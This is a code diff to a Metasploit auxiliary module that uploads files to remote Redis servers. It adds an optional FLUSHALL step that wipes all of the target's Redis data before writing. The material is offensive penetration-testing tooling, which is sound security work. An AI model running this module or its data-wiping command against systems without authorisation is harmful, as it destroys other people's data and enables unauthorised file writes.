diff --git a/modules/auxiliary/scanner/redis/file_upload.rb b/modules/auxiliary/scanner/redis/file_upload.rb index fcdf313df9..56da8a1937 100644 --- a/modules/auxiliary/scanner/redis/file_upload.rb +++ b/modules/auxiliary/scanner/redis/file_upload.rb @@ -40,7 +40,8 @@ class MetasploitModule < Msf::Auxiliary [ OptPath.new('LocalFile', [false, 'Local file to be uploaded']), OptString.new('RemoteFile', [false, 'Remote file path']), - OptBool.new('DISABLE_RDBCOMPRESSION', [true, 'Disable compression when saving if found to be enabled', true]) + OptBool.new('DISABLE_RDBCOMPRESSION', [true, 'Disable compression when saving if found to be enabled', true]), + OptBool.new('FLUSHALL', [true, 'Run flushall to remove all redis data before saving', false]) ] ) end @@ -83,6 +84,13 @@ class MetasploitModule < Msf::Auxiliary end end + if datastore['FLUSHALL'] + data = redis_command('FLUSHALL') + unless data.include?('+OK') + print_warning("#{peer} -- failed to flushall(); continuing") + end + end + # set a key in this db that contains our content # XXX: this does not work well (at all) if the content we are uploading is # multiline. It also probably doesn't work well if the content isn't